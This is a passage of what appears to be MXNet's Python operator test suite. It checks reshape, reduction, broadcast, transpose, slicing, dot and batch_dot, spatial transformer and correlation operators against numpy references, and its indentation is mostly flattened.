assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data with ndim between 1-5 and all shape dims between 1-5.
# Insert NaNs with probability equal to nan_prob.
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
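# A minimal numpy sketch (illustrative helper, not used above) of the
# prod-gradient trick in test_reduce: with out = prod(data) we have
# d out / d data[i] = out / data[i], so the backward lambda can reuse the
# forward output instead of re-multiplying all remaining elements.
def _demo_prod_gradient():
    data = np.random.rand(4) + 0.5              # keep entries away from zero
    out = np.prod(data)
    ana = out / data                            # analytic gradient
    eps = 1e-6
    num = np.array([(np.prod(data + eps * (np.arange(4) == i)) - out) / eps
                    for i in range(4)])
    assert np.allclose(num, ana, rtol=1e-3)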
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data with ndim between 1-5 and all shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_pseudo2dtranspose():
def getTwoInts(mn, mx_):  # renamed parameter to avoid shadowing the mxnet module 'mx'
    n1 = np.random.randint(mn, mx_)
    n2 = np.random.randint(mn, mx_ - 1)
    n2 = n2 if n2 < n1 else n2 + 1
    return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@with_seed()
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@with_seed()
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
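# Note on the second executor above: with grad_req="add" the gradient is
# accumulated into the user-provided array instead of overwriting it,
# which is why the expected value is xx + x_grad_npy rather than xx.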
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience of testing, the third and fourth input dims should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
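# Note on the expected values above: the localization net is zero-initialized
# except for the bias [0.5, 0, 0, 0, 0.5, 0], i.e. an affine theta that scales
# both axes by 0.5 about the center. With target_shape roughly (h/2, w/2) the
# sampler therefore reads the central half of the input, which is why forward
# and backward are compared against the [h//4:h-h//4, w//4:w-w//4] crop.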
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
continue  # 'pass' made this guard a no-op; skip the redundant 1-D cases
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
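# A compact numpy sketch (illustrative only) of the matrix-product gradient
# identities verified above: for C = A @ B with upstream gradient G,
#   dA = G @ B.T   and   dB = A.T @ G.
def _demo_dot_gradients():
    A = np.random.randn(3, 4)
    B = np.random.randn(4, 5)
    G = np.random.randn(3, 5)
    dA, dB = G @ B.T, A.T @ G
    eps = 1e-6
    A2 = A.copy()
    A2[1, 2] += eps
    num_a = (((A2 @ B) * G).sum() - ((A @ B) * G).sum()) / eps
    B2 = B.copy()
    B2[2, 3] += eps
    num_b = (((A @ B2) * G).sum() - ((A @ B) * G).sum()) / eps
    assert np.allclose(num_a, dA[1, 2], atol=1e-4)
    assert np.allclose(num_b, dB[2, 3], atol=1e-4)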
@with_seed()
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
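# Shape bookkeeping shared by the forward and backward references here:
# with padding p, kernel radius r = (kernel_size - 1) // 2 and border
# b = max_displacement + r, the output spatial extent is
#   top = (padded_size - 2 * b) // stride1
# and the number of displacement channels is
#   (2 * (max_displacement // stride2) + 1) ** 2.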
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
